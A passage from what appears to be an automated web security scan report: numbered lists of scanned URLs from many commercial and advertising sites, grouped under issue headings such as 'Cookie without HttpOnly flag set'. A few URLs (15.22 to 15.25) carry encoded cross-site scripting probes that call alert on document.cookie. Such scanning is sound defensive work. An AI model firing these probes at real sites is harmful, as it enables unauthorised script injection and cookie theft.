14.190. http://www.au2m8.com/v/

14.191. http://www.au2m8.com/v/

14.192. http://www.au2m8.com/v/

14.193. http://www.au2m8.com/v/

14.194. http://www.au2m8.com/v/

14.195. http://www.au2m8.com/v/

14.196. http://www.au2m8.com/v/

14.197. http://www.au2m8.com/v/

14.198. http://www.au2m8.com/v/

14.199. http://www.au2m8.com/v/

14.200. http://www.au2m8.com/v/

14.201. http://www.au2m8.com/v/

14.202. http://www.au2m8.com/v/

14.203. http://www.au2m8.com/v/

14.204. http://www.au2m8.com/v/

14.205. http://www.au2m8.com/v/

14.206. http://www.au2m8.com/v/

14.207. http://www.au2m8.com/v/

14.208. http://www.au2m8.com/v/

14.209. http://www.au2m8.com/v/

14.210. http://www.au2m8.com/v/

14.211. http://www.au2m8.com/v/

14.212. http://www.au2m8.com/v/

14.213. http://www.au2m8.com/v/

14.214. http://www.au2m8.com/v/

14.215. http://www.au2m8.com/v/

14.216. http://www.au2m8.com/v/

14.217. http://www.au2m8.com/v/

14.218. http://www.au2m8.com/v/

14.219. http://www.au2m8.com/v/

14.220. http://www.au2m8.com/v/

14.221. http://www.au2m8.com/v/

14.222. http://www.au2m8.com/v/

14.223. http://www.au2m8.com/v/

14.224. http://www.au2m8.com/v/

14.225. http://www.au2m8.com/v/

14.226. http://www.au2m8.com/v/

14.227. http://www.au2m8.com/v/

14.228. http://www.au2m8.com/v/

14.229. http://www.au2m8.com/v/

14.230. http://www.au2m8.com/v/

14.231. http://www.au2m8.com/v/

14.232. http://www.au2m8.com/v/

14.233. http://www.au2m8.com/v/

14.234. http://www.au2m8.com/v/

14.235. http://www.au2m8.com/v/index.php

14.236. http://www.au2m8.com/v/index.php

14.237. http://www.care2.com/news/

14.238. http://www.cisco.com/ipj/

14.239. http://www.cisco.com/warp/public/707/newsflash.html

14.240. http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html

14.241. http://www.facebook.com/

14.242. http://www.facebook.com/BlackBerry

14.243. http://www.facebook.com/BlackBerryES

14.244. http://www.facebook.com/BlackBerryFR

14.245. http://www.facebook.com/BlackBerryNL

14.246. http://www.facebook.com/BlackBerryUK

14.247. http://www.facebook.com/BlackBerryZA

14.248. http://www.facebook.com/Craig.Marshall.Deutschland

14.249. http://www.facebook.com/ajouli1

14.250. http://www.facebook.com/americanexpress

14.251. http://www.facebook.com/campaign/impression.php

14.252. http://www.facebook.com/campaign/landing.php

14.253. http://www.facebook.com/dcmoncayo

14.254. http://www.facebook.com/fabianomorige

14.255. http://www.facebook.com/laprincesita.inigulable

14.256. http://www.facebook.com/marytere.medina

14.257. http://www.facebook.com/pages/Kledyde/344540630304

14.258. http://www.facebook.com/pages/OrthoSuperSitecom/296664256434

14.259. http://www.facebook.com/pages/Orthopaedic-Trauma-Association/212018968439

14.260. http://www.facebook.com/pages/OwnerIQ/54446991004

14.261. http://www.facebook.com/pages/Tipd/39630264367

14.262. http://www.facebook.com/pointeresortsaz

14.263. http://www.facebook.com/search/

14.264. http://www.facebook.com/uschi.eller

14.265. http://www.facebook.com/vibrantmedia

14.266. http://www.forexyard.com/css/quotes-chart.cssbdb85

14.267. http://www.godaddy.com/default.aspx

14.268. http://www.linkedin.com/

14.269. http://www.linkedin.com/companies/222438/OwnerIQ

14.270. http://www.linkedin.com/groupInvitation

14.271. http://www.live.com/

14.272. http://www.livejournal.com/

14.273. http://www.mybloglog.com/links/

14.274. http://www.newsvine.com/

14.275. http://www.nmworkwear.de/

14.276. http://www.nmworkwear.de/index.php

14.277. http://www.officedepot.com/

14.278. http://www.officedepot.com/promo/list5.do

14.279. http://www.plurk.com/

14.280. http://www.protopage.com/

14.281. http://www.reddit.com/

14.282. http://www.retrevo.com/support/HP-W8000-Desktops-manual/id/3823ag123/t/2

14.283. http://www.splunk.com/download

14.284. http://www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

14.285. http://www.traffictrack.de/tracking/mpr.php

14.286. http://www.tuenti.com/

14.287. http://www.wtp101.com/pixel

14.288. http://www.yigg.de/

14.289. http://www.youtube.com/americanexpress

14.290. http://www.youtube.com/embed/208T0-OLXA8

14.291. http://www.youtube.com/embed/5aWd_-x1oPE

14.292. http://www.youtube.com/watch

14.293. http://www.zanox-affiliate.de/tpv/

14.294. https://www134.americanexpress.com/consumertravel/travel.do

14.295. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do

14.296. http://www201.americanexpress.com/business-credit-cards/

14.297. http://www201.americanexpress.com/business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789

14.298. http://www201.americanexpress.com/business-credit-cards/business-credit-cards

14.299. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

14.300. http://www201.americanexpress.com/business-credit-cards/find-business-credit-cards

14.301. http://www201.americanexpress.com/business-credit-cards/see-all-business-credit-cards

14.302. http://www201.americanexpress.com/getthecard/

14.303. http://www201.americanexpress.com/getthecard/home

14.304. https://www201.americanexpress.com/MobileWeb/index.jsp

14.305. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

14.306. https://www217.americanexpress.com/cards/home.do

14.307. https://www217.americanexpress.com/cards/shopping/index.jsp

14.308. http://www91.intel.com/b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806

14.309. http://yasnide.ivwbox.de/blank.gif

14.310. http://yasnide.ivwbox.de/cgi-bin/ivw/CP/hp-ano

14.311. http://ypn-js.overture.com/

14.312. http://zap.mookie1.com/1/vibrantmedia/RadioshackLeadQ1/201101Q1/1/1/1${TIMESTAMP}@x90

14.313. http://zh-hans.splunk.com/

14.314. http://zh-hant.splunk.com/

14.315. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21695681395940

14.316. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21706094634719

14.317. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s29366180438082

15. Cookie without HttpOnly flag set

15.1. http://66.29.38.208/log.jsp

15.2. http://about.americanexpress.com/cr/

15.3. http://ads.adxpose.com/ads/impression.js

15.4. http://appdeveloper.intel.com/en-us/join

15.5. https://axptravel.americanexpress.com/consumertravel/travel.do

15.6. http://baselinemag.us.intellitxt.com/

15.7. http://blog.vibrantmedia.com/

15.8. http://channelmarketing.owneriq.com/rmb-account/login-page

15.9. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

15.10. http://corp.americanexpress.com/gcs/cards/

15.11. http://corp.americanexpress.com/gcs/cards/land/compare.aspx

15.12. http://dailyme.com/

15.13. http://download32.us.intellitxt.com/

15.14. http://ecal.forexpros.com/e_cal.php

15.15. http://etfdb.com/

15.16. http://event.adxpose.com/event.flow

15.17. http://funp.com/

15.18. http://getclicky.com/106253

15.19. http://hellotxt.com/

15.20. http://hhonors1.hilton.com/en_US/hh/home_index.do

15.21. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type/product_problem

15.22. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/

15.23. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%27%3balert%281%29%2f%2f35f276845e/product_problem/

15.24. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/

15.25. http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%27%3balert%28document.cookie%29%2f%2f8fcf167d281/d/type/product_problem/

15.26. http://homeappliance.manualsonline.com/managemystuff.html

15.27. http://homeappliance.manualsonline.com/proxy.class.php

15.28. http://homeappliance.manualsonline.com/regman/login/loginForm

15.29. http://homeappliance.manualsonline.com/regman/user/getUserBlock

15.30. http://homeappliance.manualsonline.com/regman/user/validateUser

15.31. http://identi.ca/

15.32. http://imera.com.br/

15.33. http://info.bisk.com/MCIndex.asp

15.34. http://intellitxt.com/opt_out/ch_optout.asp

15.35. http://internetmailmanager.com/s/svrg.asp

15.36. http://live.activeconversion.com/webtracker/track.html

15.37. http://live.activeconversion.com/webtracker/track2.html

15.38. http://lovely-faces.com/index.php

15.39. http://mad4milk.net/

15.40. http://multiply.com/

15.41. http://newstrust.net/

15.42. https://online.americanexpress.com/myca/acctsumm/us/action

15.43. https://online.americanexpress.com/myca/logon/us/action

15.44. http://opensource.org/licenses/lgpl-license.php

15.45. http://opensource.org/licenses/mit-license.php

15.46. http://pdfdatabase.com/search/malayalam-kochupusthakam-free-download.html

15.47. http://phonefavs.com/

15.48. http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

15.49. http://ping.fm/

15.50. https://rewards.americanexpress.com/myca/loyalty/us/rewards/mracctmgmt/acctsumm

15.51. http://session.owneriq.net/regman/mem/initsession

15.52. http://software.intel.com/en-us/articles/intel-cloud-builders/

15.53. http://software.intel.com/sites/oss/

15.54. http://sphinn.com/

15.55. https://splunk.webex.com/mw0305l/mywebex/default.do

15.56. http://splunkbase.splunk.com/

15.57. http://starpulse.us.intellitxt.com/intellitxt/switch.asp

15.58. http://t.mookie1.com/t/v1/clk

15.59. http://t2.trackalyzer.com/trackalyze.asp

15.60. http://tbe.taleo.net/NA7/ats/careers/jobSearch.jsp

15.61. http://technorati.com/

15.62. http://tipd.com/

15.63. http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

15.64. http://twitter.com/

15.65. http://twitter.com/ORTHOSuperSite

15.66. http://twitter.com/VibrantMedia

15.67. http://twitter.com/owneriq

15.68. http://twitter.com/search/users

15.69. http://twitter.com/share

15.70. http://twitter.com/tipd

15.71. http://unalog.com/

15.72. http://us.blackberry.com/developers/*

15.73. http://www.360macedonia.com/macedonia/mk/sonovnik.php

15.74. http://www.ad4mat.de/ads/conbanner_bild1.php

15.75. http://www.amazon.com/

15.76. http://www.americanexpressfhr.com/

15.77. http://www.baselinemag.com/

15.78. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/

15.79. http://www.baselinemag.com/googlecse.html

15.80. http://www.bebo.com/

15.81. http://www.beckerortho.com/

15.82. http://www.bibsonomy.org/

15.83. https://www.blackberry.com/profile/

15.84. http://www.bookmarks.fr/

15.85. http://www.breitband-anbieter.com/

15.86. http://www.breitband-anbieter.com/news/iphone-5-ipad-2-und-die-lte-tarife-der-deutschen-telekom-659000/

15.87. http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html

15.88. http://www.coe.gatech.edu/

15.89. http://www.diigo.com/

15.90. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

15.91. http://www.download32.com/

15.92. http://www.download32.com/nslookup-software.html

15.93. http://www.download32.com/resources/calendar.css

15.94. http://www.download32.com/resources/calendar.js

15.95. http://www.ebooklibs.com/

15.96. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/

15.97. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/

15.98. http://www.eweek.com/c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/

15.99. http://www.eweek.com/c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/

15.100. http://www.eweek.com/c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/

15.101. http://www.eweek.com/c/s/Videos/

15.102. http://www.filetransit.com/files.php

15.103. http://www.folkd.com/

15.104. http://www.foxitsoftware.com/

15.105. http://www.gabbr.com/

15.106. http://www.gpg.org/

15.107. http://www.hemidemi.com/

15.108. http://www.jamespot.com/

15.109. http://www.jazdtech.com/techdirect/

15.110. http://www.jazdtech.com/techdirect/content/download.htm

15.111. http://www.jazdtech.com/techdirect/lg/logImpressions.htm

15.112. http://www.jumptags.com/

15.113. http://www.linkatopia.com/

15.114. http://www.linkedin.com/

15.115. http://www.linkedin.com/companies/222438/OwnerIQ

15.116. http://www.linkedin.com/groupInvitation

15.117. http://www.lovely-faces.com/

15.118. http://www.manualsonline.com/privacy.html

15.119. http://www.manualsonline.com/tc.html

15.120. http://www.merapakistan.com/directory/draw_list_prize_bond_draw_result_7500.html

15.121. http://www.migrationexpertzone.com/

15.122. http://www.mindbodygreen.com/

15.123. http://www.mister-wong.com/

15.124. http://www.mylinkvault.com/

15.125. http://www.myspace.com/

15.126. http://www.netlog.com/

15.127. http://www.netvouz.com/

15.128. http://www.oandp.com/

15.129. http://www.officedepot.com/

15.130. http://www.officedepot.com/promo/list5.do

15.131. http://www.oit.gatech.edu/content/information-security/

15.132. http://www.oit.gatech.edu/service/software-distribution/software-distribution

15.133. http://www.oneview.de/

15.134. http://www.opensource.org/licenses

15.135. http://www.opensource.org/licenses/gpl-license.php

15.136. http://www.opensource.org/licenses/mit-license.php

15.137. http://www.orthougm.com/nslookup.html

15.138. http://www.othawaii.com/default.asp

15.139. http://www.pdfforge.org/

15.140. http://www.pointehilton.com/

15.141. http://www.pusha.se/

15.142. http://www.retrevo.com/support/HP-W8000-Desktops-manual/id/3823ag123/t/2

15.143. http://www.slackinc.com/privacypolicy.asp

15.144. https://www.slackinc.com/reprints/order.asp

15.145. https://www.slackinc.com/subscribe/newsubs/atshcstep1.asp

15.146. https://www.slackinc.com/subscribe/newsubs/otistep1.asp

15.147. http://www.smartertechnology.com/c/s/Tools/

15.148. http://www.splunk.com/cave/narc.php

15.149. http://www.startaid.com/

15.150. http://www.stumpedia.com/

15.151. http://www.sulit.com.ph/index.php/view

15.152. http://www.symbaloo.com/

15.153. http://www.tarifcheck24.com/

15.154. http://www.technotizie.it/

15.155. http://www.usbjd.org/

15.156. http://www.viadeo.com/

15.157. http://www.vibrantmedia.co.uk/

15.158. http://www.vibrantmedia.com/about/board.asp

15.159. http://www.vibrantmedia.com/about/index.asp

15.160. http://www.vibrantmedia.com/whatisIntelliTXT.asp

15.161. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

15.162. http://www.webnews.de/

15.163. http://www.wechseln.de/

15.164. http://www.widgetbox.com/widget/bookmarks-kledyde

15.165. http://www.xerpi.com/

15.166. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

15.167. http://www1.hilton.com/en_US/hi/index.do

15.168. http://www201.americanexpress.com/business-credit-cards/

15.169. http://www201.americanexpress.com/business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789

15.170. http://www201.americanexpress.com/business-credit-cards/business-credit-cards

15.171. http://www201.americanexpress.com/business-credit-cards/business-solutions/overview

15.172. http://www201.americanexpress.com/business-credit-cards/find-business-credit-cards

15.173. http://www201.americanexpress.com/business-credit-cards/see-all-business-credit-cards

15.174. http://www201.americanexpress.com/getthecard/

15.175. http://www201.americanexpress.com/getthecard/home

15.176. https://www201.americanexpress.com/MobileWeb/index.jsp

15.177. https://www209.americanexpress.com/merchant/marketing-data/pages/home

15.178. https://www209.americanexpress.com/merchant/marketing-data/pages/marketingprograms

15.179. https://www209.americanexpress.com/merchant/marketing-data/pages/reportsandtrends

15.180. http://www212.americanexpress.com/dsmlive/dsm/dom/us/en/legaldisclosures/websiterulesandregulations.do

15.181. https://www212.americanexpress.com/dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do

15.182. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do

15.183. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do

15.184. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do

15.185. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do

15.186. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

15.187. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do

15.188. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do

15.189. https://www212.americanexpress.com/dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do

15.190. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalsavings.do

15.191. https://www212.americanexpress.com/dsmlive/dsm/int/fxip/fxinternationalpayments.do

15.192. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

15.193. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

15.194. https://www257.americanexpress.com/openhome/smallbusiness.do

15.195. https://www295.americanexpress.com/entertainmentaccess/home.do

15.196. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

15.197. https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do

15.198. http://zh-hans.splunk.com/cave/narc.php

15.199. http://zh-hant.splunk.com/cave/narc.php

15.200. http://a.rfihub.com/ca.gif

15.201. http://a.tribalfusion.com/i.cid

15.202. http://a.tribalfusion.com/j.ad

15.203. http://about.americanexpress.com/

15.204. http://about.americanexpress.com/sm/

15.205. http://action.media6degrees.com/orbserv/hbpix

15.206. http://ad.doubleclick.net/click

15.207. http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/v%3B233997820%3B0-0%3B0%3B57848017%3B1-468/60%3B39912829/39930616/1%3B%3B~okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B~sscs%3D%3fhttp://personalsavings.americanexpress.com/savings-product.html

15.208. http://ad.doubleclick.net/clk

15.209. http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.11

15.210. http://ad.yieldmanager.com/pixel

15.211. http://ad.yieldmanager.com/unpixel

15.212. http://ad.zanox.com/ppv/

15.213. http://ad.zanox.com/tpv/

15.214. http://adclick.g.doubleclick.net/aclk

15.215. http://ak1.abmr.net/is/us.blackberry.com

15.216. http://altfarm.mediaplex.com/ad/ck/14302-119028-23636-2

15.217. http://altfarm.mediaplex.com/ad/ck/9700-118565-26469-2

15.218. http://altfarm.mediaplex.com/ad/js/14302-119028-23636-2

15.219. http://altfarm.mediaplex.com/ad/nc/14302-119028-23636-2

15.220. http://amch.questionmarket.com/adsc/d852910/8/40051907/decide.php

15.221. http://ar.voicefive.com/b/wc_beacon.pli

15.222. http://ar.voicefive.com/bmx3/broker.pli

15.223. http://au2m8.com/

15.224. http://b.scorecardresearch.com/b

15.225. http://b.scorecardresearch.com/p

15.226. http://b.voicefive.com/b

15.227. http://baselinemag.us.intellitxt.com/al.asp

15.228. http://baselinemag.us.intellitxt.com/intellitxt/front.asp

15.229. http://blogmarks.net/

15.230. http://blogs.splunk.com/

15.231. http://bookmarks.yahoo.com/

15.232. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

15.233. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

15.234. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.235. http://buzz.yahoo.com/

15.236. http://buzzport.gatech.edu/

15.237. http://c03.adsummos.net/a/e/d1.ads

15.238. http://c03.adsummos.net/a/e/s21719

15.239. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

15.240. http://clk.redcated/229/go/253329229/direct

15.241. http://clk.redcated/MRT/go/258547606/direct/01/

15.242. http://clk.redcated/MRT/go/264255445/direct

15.243. http://clk.redcated/MRT/go/267859374/direct

15.244. http://clk.redcated/go/264255445/direct

15.245. http://clk.redcated/go/267859374/direct

15.246. http://corp.americanexpress.com/gcs/travel/us/

15.247. http://counter.yadro.ru/hit

15.248. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xNzk2NjkwL3QvMg/cat/267859374-193167493/qry/

15.249. http://del.icio.us/post

15.250. http://delicious.com/

15.251. http://developer.yahoo.com/yui/

15.252. http://developer.yahoo.com/yui/license.html

15.253. http://developers.facebook.com/plugins/

15.254. http://digg.com/

15.255. http://digg.com/submit

15.256. http://download32.us.intellitxt.com/al.asp

15.257. http://download32.us.intellitxt.com/intellitxt/front.asp

15.258. http://dslshop.vodafone.de/eshop/pv/97444194

15.259. http://eas.statcamp.net/eas

15.260. http://edge.quantserve.com/quant.js

15.261. http://eisenstein.dk/loader/qt.php

15.262. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252

15.263. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252

15.264. http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s29905151680577

15.265. http://friendfeed.com/

15.266. http://fusion.google.com/add

15.267. http://groups.google.com/group/jquery-dev/browse_thread/thread/36395b7ab510dd5d

15.268. http://hiltonworldwide1.hilton.com/en_US/ww/customersupport/privacy-policy.do

15.269. https://home.americanexpress.com/home/corporations.shtml

15.270. https://home.americanexpress.com/home/global_splash.html

15.271. https://home.americanexpress.com/home/mt_personal.shtml

15.272. http://i.w55c.net/rs

15.273. http://idcs.interclick.com/Segment.aspx

15.274. http://idpix.media6degrees.com/orbserv/hbpix

15.275. http://imp.constantcontact.com/imp/cmp.jsp

15.276. http://imp.constantcontact.com/imp/cmp.jsp

15.277. http://info.riministreet.com/50percentsavings.html

15.278. http://lct.salesforce.com/

15.279. https://lct.salesforce.com/

15.280. http://leadback.advertising.com/adcedge/lb

15.281. http://load.exelator.com/load/

15.282. http://map.media6degrees.com/orbserv/hbpix

15.283. http://messenger.yahoo.com/

15.284. http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461

15.285. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

15.286. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

15.287. http://mittelstandsblog.de.intellitxt.com/intellitxt/front.asp

15.288. http://mittwiki.ivwbox.de/blank.gif

15.289. http://mittwiki.ivwbox.de/cgi-bin/ivw/CP/blog

15.290. http://mm.chitika.net/minimall

15.291. http://mm.chitika.net/track

15.292. http://msdn.microsoft.com/en-us/library/ms537509(VS.85

15.293. http://myweb2.search.yahoo.com/myresults/bookmarklet

15.294. http://orthoinfo.aaos.org/

15.295. http://owneriq.postaffiliatepro.com/scripts/track.php

15.296. http://pixel.33across.com/ps/

15.297. http://pixel.intellitxt.com/pixel.jsp

15.298. http://pixel.quantserve.com/pixel

15.299. http://px.owneriq.net/cm

15.300. http://px.owneriq.net/oxcm

15.301. http://px.owneriq.net/p

15.302. http://qooxdoo.org/

15.303. http://quotes.forexyard.com/quotes2.js

15.304. http://rt32.infolinks.com/action/doq.htm

15.305. http://rt82.infolinks.com/action/doq.htm

15.306. http://rt83.infolinks.com/action/doq.htm

15.307. https://sb.voicefive.com/b

15.308. http://segment-pixel.invitemedia.com/pixel

15.309. http://sourceforge.net/projects/winscp/

15.310. http://splunkbase.splunk.com/account:session/

15.311. http://spongecell.com/api/widgets/clickthrough/263365

15.312. http://statse.webtrendslive.com/dcsjpsizt10000o69qvsmy5ls_9m8u/dcs.gif

15.313. http://survey.questionmarket.com/noauth/ktag_log.php

15.314. http://tags.bluekai.com/site/2956

15.315. http://tools.cisco.com/search/display

15.316. http://track2.mybloglog.com/js/jsserv.php

15.317. http://tracker.icerocket.com/services/gatherer.php

15.318. http://tracker.icerocket.com/services/gatherer.php

15.319. http://tracker.icerocket.com/services/gatherer.php

15.320. http://tracker.icerocket.com/services/gatherer.php

15.321. http://tracker.icerocket.com/services/gatherer.php

15.322. http://tracker.icerocket.com/services/gatherer.php

15.323. http://tracker.icerocket.com/services/gatherer.php

15.324. http://tracker.icerocket.com/services/gatherer.php

15.325. http://tracker.icerocket.com/services/gatherer.php

15.326. http://tracker.icerocket.com/services/gatherer.php

15.327. http://tweetmeme.com/story/3866851775/

15.328. http://us.blackberry.com/assets_refresh/images/dropNavArrow.png

15.329. http://vegetarian.about.com/od/soupsstewsandchili/r/hotandsour.htm

15.330. http://whitepixel.com/backend/remote/

15.331. http://www.active-srv02.de/werbemittel/WebObjects/werbemittel.woa/wa/ads

15.332. http://www.addthis.com/bookmark.php

15.333. http://www.alistapart.com/articles/taminglists/

15.334. https://www.americanexpress.com/airlines-credit-card/

15.335. https://www.americanexpress.com/credit-card-rewards/

15.336. https://www.americanexpress.com/gift/giftcardslanding.shtml

15.337. https://www.americanexpress.com/gold-card/

15.338. https://www.americanexpress.com/no-annual-fee-credit-cards/

15.339. http://www.au2m8.com/favicon.ico

15.340. http://www.au2m8.com/v/

15.341. http://www.au2m8.com/v/

15.342. http://www.au2m8.com/v/

15.343. http://www.au2m8.com/v/

15.344. http://www.au2m8.com/v/

15.345. http://www.au2m8.com/v/

15.346. http://www.au2m8.com/v/

15.347. http://www.au2m8.com/v/

15.348. http://www.au2m8.com/v/

15.349. http://www.au2m8.com/v/

15.350. http://www.au2m8.com/v/

15.351. http://www.au2m8.com/v/

15.352. http://www.au2m8.com/v/

15.353. http://www.au2m8.com/v/

15.354. http://www.au2m8.com/v/

15.355. http://www.au2m8.com/v/

15.356. http://www.au2m8.com/v/

15.357. http://www.au2m8.com/v/

15.358. http://www.au2m8.com/v/

15.359. http://www.au2m8.com/v/

15.360. http://www.au2m8.com/v/

15.361. http://www.au2m8.com/v/

15.362. http://www.au2m8.com/v/

15.363. http://www.au2m8.com/v/

15.364. http://www.au2m8.com/v/

15.365. http://www.au2m8.com/v/

15.366. http://www.au2m8.com/v/

15.367. http://www.au2m8.com/v/

15.368. http://www.au2m8.com/v/

15.369. http://www.au2m8.com/v/

15.370. http://www.au2m8.com/v/

15.371. http://www.au2m8.com/v/

15.372. http://www.au2m8.com/v/

15.373. http://www.au2m8.com/v/

15.374. http://www.au2m8.com/v/

15.375. http://www.au2m8.com/v/

15.376. http://www.au2m8.com/v/

15.377. http://www.au2m8.com/v/

15.378. http://www.au2m8.com/v/

15.379. http://www.au2m8.com/v/

15.380. http://www.au2m8.com/v/

15.381. http://www.au2m8.com/v/

15.382. http://www.au2m8.com/v/

15.383. http://www.au2m8.com/v/

15.384. http://www.au2m8.com/v/

15.385. http://www.au2m8.com/v/

15.386. http://www.au2m8.com/v/

15.387. http://www.au2m8.com/v/

15.388. http://www.au2m8.com/v/

15.389. http://www.au2m8.com/v/

15.390. http://www.au2m8.com/v/

15.391. http://www.au2m8.com/v/

15.392. http://www.au2m8.com/v/

15.393. http://www.au2m8.com/v/

15.394. http://www.au2m8.com/v/

15.395. http://www.au2m8.com/v/

15.396. http://www.au2m8.com/v/

15.397. http://www.au2m8.com/v/

15.398. http://www.au2m8.com/v/

15.399. http://www.au2m8.com/v/

15.400. http://www.au2m8.com/v/

15.401. http://www.au2m8.com/v/

15.402. http://www.au2m8.com/v/

15.403. http://www.au2m8.com/v/

15.404. http://www.au2m8.com/v/

15.405. http://www.au2m8.com/v/

15.406. http://www.au2m8.com/v/

15.407. http://www.au2m8.com/v/

15.408. http://www.au2m8.com/v/

15.409. http://www.au2m8.com/v/

15.410. http://www.au2m8.com/v/

15.411. http://www.au2m8.com/v/

15.412. http://www.au2m8.com/v/

15.413. http://www.au2m8.com/v/

15.414. http://www.au2m8.com/v/

15.415. http://www.au2m8.com/v/

15.416. http://www.au2m8.com/v/

15.417. http://www.au2m8.com/v/

15.418. http://www.au2m8.com/v/

15.419. http://www.au2m8.com/v/

15.420. http://www.au2m8.com/v/

15.421. http://www.au2m8.com/v/

15.422. http://www.au2m8.com/v/

15.423. http://www.au2m8.com/v/

15.424. http://www.au2m8.com/v/

15.425. http://www.au2m8.com/v/

15.426. http://www.au2m8.com/v/

15.427. http://www.au2m8.com/v/

15.428. http://www.au2m8.com/v/

15.429. http://www.au2m8.com/v/

15.430. http://www.au2m8.com/v/index.php

15.431. http://www.au2m8.com/v/index.php

15.432. https://www.blackberry.com/partnerzone/Forward.action

15.433. https://www.blackberry.com/partnerzone/Login.action

